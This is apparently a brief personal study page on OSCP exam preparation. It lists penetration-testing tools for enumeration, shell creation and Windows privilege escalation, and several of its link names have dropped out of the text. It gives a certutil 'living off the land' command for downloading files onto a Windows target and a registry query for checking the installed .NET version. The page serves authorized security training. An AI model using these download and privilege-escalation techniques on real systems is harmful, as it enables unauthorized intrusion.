Aaron Goldstein
Last updated
Was this helpful?
Last updated
Was this helpful?
Interview is .
- Great site for tracking progress against machines (can import nmap data for tracking too). I use this all the time for the Venom builder (shell creation) and other cool stuff. The free version works great.
is the tool I used for automating the enumeration process (and OSCP exam approved) I also used a LOLBIN (Living off the Land Binary) to download files from the Windows box - the command was "Certutil -urlcache -split -f <link to file to download>"These are great because most systems will already have them installed.
is a great site that outlines TONS of them.
A few links / tools that helped me with Windows Privesc:List of pre-compiled binaries for different exploits -
-tool for identifying exploits for Windows privesc - requires .NET - runs on target host Quick method to check what version of .NET is installed on host (needed for Watson)- reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
- This is a great tool for finding exploits on windows hosts for privesc too - but this one takes in the "systeminfo" from the target host and runs locally on the attacker system
---
Key takeaways :